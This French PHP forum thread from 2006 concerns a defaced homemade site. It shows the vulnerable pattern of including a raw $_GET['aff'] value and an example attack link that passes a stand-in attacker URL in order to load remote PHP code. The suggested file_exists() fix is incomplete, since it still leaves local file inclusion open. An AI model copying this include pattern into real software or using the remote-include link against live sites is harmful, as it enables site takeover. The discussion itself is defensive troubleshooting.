PHPfrance

la communauté d'entraide francophone dédiée au PHP

hack de mon site

Répondre


Cette question est un moyen d’empêcher des soumissions automatisées de formulaires par des robots.
Smileys
:D :) :( :o :shock: :? 8-) :lol: :x :P :oops: :cry: :evil: :twisted: :roll: :wink: :!: :?: :idea: :arrow: :| :mrgreen: =D> #-o =P~ :^o :non: :priere: 8-|
Voir plus de smileys
  Revue du sujet
 

  Étendre la vue Revue du sujet : hack de mon site

Ouf merci

par Aï Aî » 22 août 2006, 11:46

Merci à vous.
j'ai fait une belle boulette.
Au moins je connais l'origine de la faille et je vais pouvoir la corriger.
Merci à vous.
:)

par iclo » 22 août 2006, 01:02

En effet, c'est une belle faille de sécurité.
La règle de base, c'est de ne jamais faire confiance aux informations de l'utilisateur.

par HanX » 22 août 2006, 00:50

avant ton include, rajoute :
if (file_exists($aff)) {
include $aff; }
else {
include "autrepage.php";
}
pour répondre à ta quesion oui, va voir la doc de la fonction include

enfin, petit conseil, évite de mettre des url avec des .php genre "index.php?page=users.php" mais plutot "index.php?page=users" ou mieux "users.php" (avec un rewriting url par .htacces)

construction maison

par Aï Aï » 21 août 2006, 23:28

Salut Cyrano,
En fait, c'est une construction maison.

Je fais ça :

J'affiche un menu avec des liens comme ça :
<a href="page1.php?aff=page1.php">page 1</a
<a href="page2.php?aff=page2.php">page 2</a
$aff = $_GET['aff'];
include ($aff);
Vous comprenez ?
Je crois qu'avec ce code, je permets à quelqu'un d'exécuter un code php (puisqu'il y a le include) si la personne remplace : aff=page2.php par l'adresse d'un code.
Est-ce possible ?
Merci

par Cyrano » 21 août 2006, 23:15

Comme l'a mentionné iclo, sans code, on peut rien faire et comme tu ne précises même pas l'url du site, on pourra même pas avoir une idée de la méthode d'intrusion utilisée. Ton site est fait avec quoi au juste ? Un CMS ou c'est une construction maison complète ?

problème sur les "aff" ?

par Aï Aî » 21 août 2006, 23:10

Re,
Je crois que ça vient de ça :
J'ai fait des liens comme ça :

<a href="index.php?aff=page.php">nomdelapage</a
je crois comprendre dans le message du haker qu'il entre car je ne filtre pas le aff.
Est-ce que le code que j'ai mis ne permet pas en fait d'exécuter un code php s'il remplace "page.php" par un code en mettant par exemple :

<a href="index.php?aff=http://www.sonsite.php/soncodepirate.ph ... elapage</a ?
En fait il a réussi à changer ma page d'accueil.

Merci bien pour votre aide.

par iclo » 21 août 2006, 22:58

Sans code, on ne peu rien te dire....

hack de mon site

par Aï Aï » 21 août 2006, 22:36

Salut,
Je me suis fais pirater mon site, glups.
J'ai eu ça comme message :
Defaced by Great
Hehe. Administrator, you should carefully watch over your site ;)
No data has been deleted from your site.

Greetz: DaMaGeLaB.OrG, specially to Duke03 =)
Fuckz: Web-hack.ru, specially to Terabyte

To administrator: your script txt/index.php has the serious error. You should filter input parameter 'aff' to provide unauthorized access to your site

See you again soon ;)
Qui peut m'aider à comprendre d'ou vient mon problème et comment ils ont fait afin que je corrive ma faille de sécurité !
Merci beaucoup
:evil: